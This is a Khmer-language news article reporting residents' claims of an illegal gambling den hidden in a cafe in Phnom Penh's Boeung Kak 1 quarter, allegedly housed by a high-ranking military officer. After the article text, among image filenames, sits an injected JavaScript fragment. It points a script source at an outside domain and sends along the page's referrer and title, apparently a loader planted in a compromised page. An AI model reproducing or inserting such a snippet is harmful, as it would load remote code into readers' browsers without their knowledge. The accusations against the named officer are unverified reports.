Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

ហាងកាហ្វេបង្កប់ល្បែងបៀរ អាប៉ោង និងឆ្នោតយួន ក្នុងសង្កាត់បឹងកក់ទី១ ល្បីថា លោកស័ក្តិប្រាំជាអ្នកផ្តល់ទីតាំង

ភ្នំពេញ ៖ តាមសេចក្តីរាយការណ៍របស់ប្រជាពលរដ្ឋបានអោយដឹងថា ទីតាំងល្បែងបៀរ អាប៉ោង និង កន្ទុយលេខមួយកន្លែងជ្រកក្រោម ហាងកាហ្វេ កំពុងអូសទាញអ្នកញៀនល្បែងក្នុងខណ្ឌទួលគោក អោយរុលក្បាលគ្នាចូលទៅលេងដោយពុំឃើញមានសមត្ថកិច្ចជំនាញណាចុះទៅពិនិត្យនៅឡើង។

ទីតាំងខាងលើនេះស្ថិតនៅក្នុងសង្កាត់បឹងកក់ទី1 ចូលតាមផ្លូវ 347 ជាប់និងផ្លូវ598 ដែលទល់មុន ទូកុងតឺន័រចាស់មួយ ។
ប្រជាពលរដ្ឋបង្ហើបប្រាប់ថា ម្ចាស់ទីតាំងបើកល្បែង ជ្រកក្រោម ហាងកាហេ្វនោះ មានឈ្មោះ តា ម៉ាប់ ជាមន្ត្រីយោធាពាក់ស័ក្តិ៥។
មតិមហាជនឆ្ងល់ដែលថា ហេតុអី្វបានជាពួកអ្នកលេងល្បែងទាំងនេះ អាចលេងបានដោយសេរី និងមាន សំឡេងហ៊ោកញ្ជ្រៀវទៀត តែម៉េចមិនឃើញវត្តមានរបស់បងៗសមត្ថកិច្ចខណ្ឌទួលចុះបង្ក្រាបចឹង?
ប្រហែលជា បងសមត្ថកិច្ច លោកមិនទាន់ជ្រាបទេដឹង? ចុះបើដឹង ម៉េចមិនបង្ក្រាប? ឬមិនហ៊ានបង្ក្រាប ព្រោះម្ចាស់ទីតាំងពាក់លោកខែ?
តែបងសមត្ថកិច្ចមិនគួរទៅខ្លាចទេ ព្រោះ នៅព្រឹកថ្ងៃទី២៦ ខែតុលាឆ្នាំ ២០១៦នេះ រដ្ឋមន្រ្តីក្រសួងមហាផ្ទៃ បញ្ជាសមត្ថកិច្ចពាក់ព័ន្ធអនុវត្តសេចក្តីណែនាំវិធានការបង្ក្រាបល្បែងស៊ីសងខុសច្បាប់អោយមានប្រសិទ្ធិភាពខ្ពស់ ។

img_2967img_295314522863_662700733906452_4363962705622510851_ns.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More